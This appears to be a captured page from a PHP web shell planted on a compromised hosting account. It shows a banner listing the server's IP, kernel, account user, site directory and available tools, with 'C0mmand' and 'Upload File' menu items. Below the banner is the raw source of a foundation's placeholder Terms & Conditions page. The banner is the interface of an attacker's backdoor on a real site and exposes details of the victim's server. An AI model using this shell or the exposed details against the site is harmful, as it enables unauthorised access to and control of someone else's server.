Server IP : 103.53.40.154 / Your IP : 18.191.200.223 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/greenenvirofoundation.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <?php include'top-links.php'?> <title>Terms & Conditions </title> <style> #privacy h3, #privacy h4 { color: #4baf47; } #privacy h3 { border-bottom: 2px solid #4baf47; padding-bottom: 10px; } #privacy h4 { margin-top: 20px; border-bottom: 1px solid #ddd; padding-bottom: 5px; } #privacy p { margin: 15px 0; } #privacy ul { margin: 10px 0; padding-left: 20px; } #privacy li { margin-bottom: 10px; } #privacy a { color: #4baf47; text-decoration: none; } #privacy a:hover { text-decoration: underline; } #privacy address { margin: 20px 0; font-style: normal; } </style> </head> <body> <?php include 'header.php'?> <main> <section class="page-banner bg-image pt-130 pb-130"> <div class="container"> <h4 class="wow fadeInUp" data-wow-duration="1.2s" data-wow-delay=".2s">Terms & Conditions </h4> <div class="breadcrumb-list wow fadeInUp" data-wow-duration="1.4s" data-wow-delay=".4s"> <a href="index.html">Home :</a> <span class="primary-color">Terms & Conditions </span> </div> </div> </section> <section id="privacy"> <div class="container"> <h3>Terms & Conditions for Green Enviro Foundation</h3> <h4>1. Introduction</h4> <p>Welcome to Green Enviro Foundation ("we," "our," "us"). By accessing or using our website [insert website URL], you agree to comply with and be bound by the following terms and conditions. Please read them carefully.</p> <h4>2. Use of Our Website</h4> <p>You agree to use our website only for lawful purposes and in a manner that does not infringe on the rights of, restrict, or inhibit anyone else's use and enjoyment of the site. Prohibited conduct includes harassment, sending unsolicited communications, and distributing harmful or disruptive software.</p> <h4>3. Intellectual Property</h4> <p>All content on our website, including text, graphics, logos, and images, is the property of Green Enviro Foundation or its content suppliers and is protected by copyright and intellectual property laws. You may not reproduce, distribute, or use any content without our prior written permission.</p> <h4>4. Limitation of Liability</h4> <p>To the fullest extent permitted by law, Green Enviro Foundation shall not be liable for any direct, indirect, incidental, special, or consequential damages arising from or related to your use of our website. This includes, but is not limited to, damages for loss of profits, goodwill, data, or other intangible losses.</p> <h4>5. External Links</h4> <p>Our website may contain links to third-party websites. We do not endorse or assume any responsibility for the content, privacy policies, or practices of any third-party sites. You access such sites at your own risk.</p> <h4>6. Modifications to the Terms</h4> <p>We reserve the right to modify these terms and conditions at any time. Any changes will be posted on this page with an updated effective date. Your continued use of our website after any modifications constitutes acceptance of the new terms.</p> <h4>7. Governing Law</h4> <p>These terms and conditions are governed by and construed in accordance with the laws of [Insert Jurisdiction]. Any disputes arising under or in connection with these terms shall be subject to the exclusive jurisdiction of the courts of [Insert Jurisdiction].</p> <h4>8. Contact Us</h4> <p>If you have any questions about these Terms & Conditions, please contact us at:</p> <address> <strong>Green Enviro Foundation</strong><br> [Insert Address]<br> [Insert City, State, ZIP Code]<br> Email: <a href="mailto:[insert email address]">[insert email address]</a><br> Phone: [insert phone number] </address> </div> </section> </main> <?php include 'footer.php'?> </body> </html>